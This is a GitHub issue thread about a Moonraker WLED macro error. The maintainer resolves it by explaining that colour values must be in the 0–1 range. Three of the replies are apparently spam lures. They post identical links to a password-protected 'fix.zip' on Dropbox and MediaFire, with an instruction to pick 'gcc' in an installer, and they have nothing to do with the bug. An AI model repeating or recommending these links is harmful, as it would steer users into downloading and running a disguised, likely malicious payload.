Arksine/moonraker #899: "SET_WLED" Macro does nothing - Error running remote method: set_wled

NuclearKitty, 2024-08-26:
### What happened

I connected my ESP-01 board via serial to the CM4 GPIO for controlling my chamber lights with WLED. I Imported the WLED macros and got it somewhat working. Every macro that calls the "set_wled_state" method works. I can turn the lights on, off, set brightness and call local presets from the macro.

But then the "set_wled" Macro does absolutely nothing and throws this error in moonraker.log

```
2024-08-26 04:49:05,483 [klippy_connection.py:_execute_method()] - Error running remote method: set_wled
Traceback (most recent call last):
  File "/home/klipthewing/moonraker/moonraker/components/klippy_connection.py", line 563, in _execute_method
    await ret
  File "/home/klipthewing/moonraker/moonraker/components/wled.py", line 505, in set_wled
    await self.strips[strip].set_wled(red, green, blue, white,
  File "/home/klipthewing/moonraker/moonraker/components/wled.py", line 222, in set_wled
    self._update_color_data(red, green, blue, white, index)
  File "/home/klipthewing/moonraker/moonraker/components/wled.py", line 111, in _update_color_data
    self._chain_data[(index-1)*elem_size:index*elem_size] = led_data
    ~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ValueError: byte must be in range(0, 256)
```

### Client

Mainsail

### Browser

Other or N/A

### How to reproduce

- Set up ESP microcontroller with WLED
- Connect it to Moonraker via serial (dont know if serial or wifi really matters)
- If connected by serial, enable serial hardware in raspi-config
- Add a [wled] block to moonraker.conf and the wiki macros to printer.cfg
- Verify that "WLED_ON" or "WLED_OFF" macros work correctly
- Try to use "SET_WLED" macro

### Additional information

[moonraker.log](https://github.com/user-attachments/files/16743636/moonraker.log)

Mlecherf, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

Dev-Victor-Rodrigues, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Wanderx13, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Arksine, 2024-08-27:
It appears that you are sending an invalid value for one of the colors when calling `SET_WLED`.  Make sure the values are always between 0 and 1.  That said, I think the code here should constrain values received rather than raise an exception, its something I'll look into.

NuclearKitty, 2024-08-27:
Thank you for the help, yes indeed the issue was that I tried to set a color to 255. Setting a color to 1 works and turns it to full brightness.

That means that there is an inconsistency in how the macros are used though. Brightness control within "WLED_CONTROL" macro works with numbers from 0-255, but every vontrol within "SET_WLED" works from 0-1. I assumed that both would be 0-255...

Arksine, 2024-08-28:
My understanding when the `wled` module was contributed is that the goal of `SET_WLED` was to mimic Klipper's `SET_LED` gcode command, which uses a range from 0 to 1 to set a color.  I suppose the author felt that the values in `set_wled_state` were sufficiently different that it made sense to use integer values.   I do agree that this isn't consistent, however changing it would break existing configurations.

NuclearKitty, 2024-08-29:
I understand. Thanks for the help again. Having WLED running the lights makes things so much more convenient :)

closed 2024-08-29 by NuclearKitty